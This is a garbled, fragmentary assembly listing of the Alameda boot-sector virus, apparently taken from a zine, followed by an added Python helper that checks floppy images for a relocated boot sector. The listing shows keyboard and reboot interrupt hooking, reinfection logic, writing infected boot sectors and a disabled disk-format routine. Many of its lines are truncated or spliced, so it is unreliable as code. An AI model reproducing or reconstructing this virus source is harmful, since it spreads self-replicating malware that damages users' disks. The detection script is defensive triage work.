; IF ALT & CTRL & ? THEN ...                                            ;
;-----------------------------------------------------------------------;
NEW_PUSH DS
     USH CS             ;DS=CS
           
                                   MOV  BX,[ALT_CTRL W]     ;BX=SCAN CODE LAST T
IN  CMP  AL,1DH              ;IS IT A [CTRL]...
    JNE  N09_10              ;...JUMP IF NO
    MOV  BL,AH               ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
    JMP  N09_30              ;
                        ;
N09_       
N09_JE   N09_X0              ;...JUMP IF YES
                                   JE   ACK_KEYBD      ;..                        ;
N09_30:  MOV  [ALT_CTRL],BX       ;SAVE SCAN CODE FOR NEXT TIME

N09_POPF                ;

    DB   0EAH           ;JMP F000:E987
OLD_                    ;
N09_X0:  JMP  N09_X1              ;
                        ;
;-----------------------------------------------------------------------;
;                                                                       ;
;-----------------------------------------------------------------------;
RBOOT:   MOV  DX,03D8H        DISABLE COLOR VIDEO !?!?
                                   CALL DELAY               ;
    MOV  [ALT_CTRL],AX  ;AX=0     ;

    MOV  AL,3 ;AH=0           SELECT 80x25 MOV  AH,2               ;SET CURSOR P
XOR INT  10H            ;
    MOV  CX,0607H
    INT  10H            ;

    MOV  AX,0420H       ;DELAY (AL=20H FOR EOI BELOW)
    CALL DELAY               ;
                        ;
    CLI                 ;
                                   OUT  20H,AL               ;SEND EOI TO INT CO
    MOV  SI,offset BEGIN - 128    ;
                        ;
    MOV  Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
        MOV  [0017H]INC  Word Ptr [0013H]    ;MEMORY SIZE += 1024 (WERE NOT ACTI
   
                                   PUSH DS              ;IF BIOS F000:E502 == 21
MOV  AX,0F000H
                        ;
R_90                    ;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR                                                     ;
;-----------------------------------------------------------------------;
NEW_JNZ  N19_20                ...JUMP
N19_10:  PUSH CS             ;ELSE ES=CS
                                    CALL PUT_NEW_09          ;SAVE/REDIRECT INT 
INT                     ;
N19_         
N19_MOV  AH,00               ;RESET DISK
    INT  13             ;JB       N19_81              ;
    MOV  AX,0201             ;READ BOOT SECTOR
    PUSH DS             ;
    POP  ES             ;
    INT  13H            ;
N19_LOOP      2               
    JMP  N19_10               IF RETRY EXPIRED...LOAD BASIC
                                                                                                           
;-----------------------------------------------------------------------;
; Reinfection segment.                                                  ;
;-----------------------------------------------------------------------;
N19_JNZ  RE_INFECT      ;...RE INFECT
                        ;
JMP_                    ;
;-----------------------------------------------------------------------;
; Reinfection Segment.                                                  ;
;-----------------------------------------------------------------------;
RE_INFECT:                   ;
    MOV  CX,00E6H           OURSELF
    CLD                 ;
                               
    REPE CMPSB               ;
    JE   RI_12               ;IF NOT EQUAL...
                        ;
    INC  Word Ptr ES:[COUNTER_1]  ;INC. COUNTER IN OUR CODE (NOT DS!)
                        ;
;MAKMOV  BX,offset TABLE          ;FORMAT INFO
    MOV  AH,5           ;FORMAT
    JMP  RI_10               ;REMOVE THE FORMAT OPTION FOR NOW !
                        ;
; <<< NO EXECUTION PATH TO HERE >>>    ;
                        ;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_1MOV  AX,0301H       ;WRITE 1 SECTOR
                                   IPUSH CS                 (ES=CS FOR PUT_NEW_0
9 BELJB       RI_80               ;IF WRITE ERROR...JUMP TO BOOT CODE
                        ;
         CX,0001             ;WRITE INFECTED BOOT SECTOR !
                        ;
RI_12:   MOV  DI,3456H       ;SET oJUST INFECTED ANOTHER ONE@...
                        ;
RI_80:   CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEYBOARD)
    DEC  Word Ptr ES:[COUNTER_1]  ;   (DEC. CAUSE DIDNT INFECT)
                        ;
;-----------------------------------------------------------------------;
;                                                                       ;
;-----------------------------------------------------------------------;
N09_MOV  DS,BX               ;
            
;-----------------------------------------------------------------------;
; DELAY                                                                 ;
;                                                                       ;
; ON ENTRY    AH:CX = LOOP COUNT                                        ;
;-----------------------------------------------------------------------;
DELAY    SUB  CX,CX               ;
D_01JNZ  D_01
    RET                 ;
                        ;

;                                                                       ;
;-----------------------------------------------------------------------;
A7DF4         DB   27H,00H,8,2

COUNTER_1     DW   001CH
ALT_CTRL      DW   0
A7DFC         DB   27H,0,8,2
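The notes on the Alameda virus above say the real boot sector is parked at track 39, head 0, sector 8 without being marked in the FAT. The following is an added triage helper, not part of the zine listing, that checks a raw floppy image for exactly that pattern; the diskette geometry (heads, sectors per track) and the synthetic image it builds are assumptions of the example.

```python
"""Floppy-image triage for a displaced boot sector (added example, not
part of the zine listing).  The Alameda notes say the real boot sector
is parked at track 39, head 0, sector 8 and is not marked in the FAT.
Geometry (heads, sectors per track) is an assumption supplied by the
caller; 2 heads x 9 sectors x 40 tracks is a 360K diskette."""

SECTOR = 512
PARKED_CHS = (39, 0, 8)          # track, head, 1-based sector from the notes

def chs_to_lba(track, head, sector, heads, spt):
    """Standard floppy CHS -> LBA; sector numbers start at 1."""
    return (track * heads + head) * spt + (sector - 1)

def looks_like_dos_boot_sector(sec):
    """Heuristic: x86 JMP at offset 0, printable OEM name at bytes 3..10,
    and the 0x55AA signature at offset 510."""
    if len(sec) != SECTOR or sec[0] not in (0xEB, 0xE9):
        return False
    oem_ok = all(0x20 <= b < 0x7F for b in sec[3:11])
    return oem_ok and sec[510:512] == b"\x55\xAA"

def assess_image(image, heads=2, spt=9):
    """Describe sector 0 and the parking sector.  A DOS-shaped boot sector
    at the parking location while sector 0 is not DOS-shaped is the
    relocation pattern described in the notes."""
    lba = chs_to_lba(*PARKED_CHS, heads, spt)
    sec0_ok = looks_like_dos_boot_sector(image[:SECTOR])
    parked_ok = looks_like_dos_boot_sector(image[lba * SECTOR:(lba + 1) * SECTOR])
    return {"parking_lba": lba, "sector0_is_dos_boot": sec0_ok,
            "parked_is_dos_boot": parked_ok,
            "suspicious": parked_ok and not sec0_ok}

def constructed_image(displaced):
    """Constructed 360K test image (no real virus code): a DOS-style boot
    sector, optionally moved to the parking sector with sector 0 replaced
    by a stub whose first byte is not a JMP."""
    dos_boot = (b"\xEB\x3C\x90" + b"MSDOS5.0").ljust(510, b"\x00") + b"\x55\xAA"
    stub = b"\xFA".ljust(510, b"\x00") + b"\x55\xAA"   # CLI, then padding
    img = bytearray(SECTOR * 2 * 9 * 40)
    if displaced:
        img[:SECTOR] = stub
        lba = chs_to_lba(*PARKED_CHS, 2, 9)
        img[lba * SECTOR:(lba + 1) * SECTOR] = dos_boot
    else:
        img[:SECTOR] = dos_boot
    return bytes(img)

if __name__ == "__main__":
    for flag in (False, True):
        print("displaced" if flag else "clean", assess_image(constructed_image(flag)))
```

For a single-sided 8-sector format, pass heads=1 and spt=8; the parking sector then lands at LBA 319 instead of 709, which is why the notes say head 0, sector 8 is common to every floppy format.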


